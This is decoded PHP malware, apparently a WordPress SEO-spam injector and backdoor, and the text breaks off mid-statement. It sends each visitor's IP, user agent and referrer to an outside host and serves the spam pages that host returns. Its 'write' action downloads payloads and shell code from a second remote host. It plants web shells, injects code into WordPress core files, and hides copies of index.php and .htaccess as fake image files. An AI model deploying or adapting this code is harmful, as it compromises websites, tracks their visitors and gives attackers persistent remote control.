/* Decoded by unphp.net */ error_reporting(0); $go_domain = "seo31.tophead.online"; $language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4); $userrefer = $_SERVER['HTTP_REFERER']?$_SERVER['HTTP_REFERER']:""; $useragent = $_SERVER['HTTP_USER_AGENT']?$_SERVER['HTTP_USER_AGENT']:""; $userip = ''; @$timezone_out = date_default_timezone_get(); if(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $userip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $userip = $_SERVER['REMOTE_ADDR']; } if(is_https()){ $http = 'https'; }else{ $http = 'http'; } $index_url = "http://$go_domain/index.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s&zone=%s"; $sitemap_url = "http://$go_domain/sitemap.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&zone=%s"; $host = $_SERVER['HTTP_HOST']; $uri = $_SERVER['REQUEST_URI']; @$action = $_GET['ac']?$_GET['ac']:""; if($action != "" && $action == "write"){ $index_name = basename($_SERVER['SCRIPT_NAME']);; write($index_name); echo "write done!"; exit(); }elseif($action != "" && $action == "check"){ $bool = check(); if($bool){ echo "check code exists!"; }else{ echo "check code not exists!"; } exit(); }elseif($action != "" && $action == "sitemap"){ $sitemap = "https://www.google.com/webmasters/sitemaps/ping?sitemap=$http://$host/sitemap.xml"; $contents = file_get_contents($sitemap); echo $contents; exit(); } if(preg_match('@^/sitemap([1-9])?.xml$@i',$uri)){ $request = sprintf($sitemap_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($timezone_out)); $content = get($request); @header("Content-type: text/xml"); echo trim($content); exit(); }elseif(substr($uri, -4) == ".css"){ $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip, urlencode($timezone_out)); $content = get($request); if(strstr($content,'okhtmlgetcontent')){ @header("Content-type: text/css; charset=utf-8"); $content = str_replace("okhtmlgetcontent",'',$content); echo trim($content); exit(); } }else{ $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip, urlencode($timezone_out)); $content = get($request); if(strstr($content,'okhtmlgetcontent')){ @header("Content-type: text/html; charset=utf-8"); $content = str_replace("okhtmlgetcontent",'',$content); echo trim($content); exit(); }else if(strstr($content,'getcontent404page')){ @header('HTTP/1.1 404 Not Found'); echo "404 Not Found"; exit(); }else if(strstr($content,'getcontent301page')){ @header('HTTP/1.1 301 Moved Permanently'); $content = str_replace("getcontent301page",'',$content); header('Location: '.trim($content)); exit(); } } function write($index_name){ $write1 = get("http://hello.turnedpro.xyz/write1.txt"); $write2 = get("http://hello.turnedpro.xyz/write2.txt"); $write3 = get("http://hello.turnedpro.xyz/write3.txt"); $shell_postfs = get("http://hello.turnedpro.xyz/mm1.txt"); $shell_load = get("http://hello.turnedpro.xyz/mm2.txt"); $ht_content = file_get_contents(".htaccess"); $index_content = file_get_contents($index_name); $loader_php = "wp-includes/template-loader.php"; $load_php = "wp-includes/load.php"; $font_editor_php = "wp-includes/SimplePie/font-editor.php"; if(!is_dir("css")){ mkdir("css", 0755, true); } if($index_name != "index.php"){ $write1 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write1); $write2 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write2); $write3 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write3); } file_put_contents("css/load.php", $shell_load); if(is_dir("wp-includes/SimplePie")){ file_put_contents("wp-admin/images/arrow-lefts.png", $index_content); file_put_contents("wp-admin/images/arrow-rights.png", $ht_content); file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content); file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content); $loader_content = file_get_contents($loader_php); $load_content = file_get_contents($load_php); @chmod($loader_php, 0755);@chmod($load_php, 0755); file_put_contents($loader_php, $write1.$loader_content); file_put_contents($load_php, $load_content.$write2); @chmod($loader_php, 0644);@chmod($load_php, 0644); file_put_contents($font_editor_php, $shell_postfs); }else{ if(!is_dir("images")){ mkdir("images", 0755, true); } if(!is_dir("admin")){ mkdir("admin", 0755, true); } file_put_contents("admin/votes.php", $shell_postfs); file_put_contents("images/arrows.png", $index_content); file_put_contents("images/icons.png", $ht_content); file_put_contents("template-load.php", $write3); if(substr(trim($index_content), -2) == "?>" || substr(trim($index_content), -7) == ""){ file_put_contents($index_name, "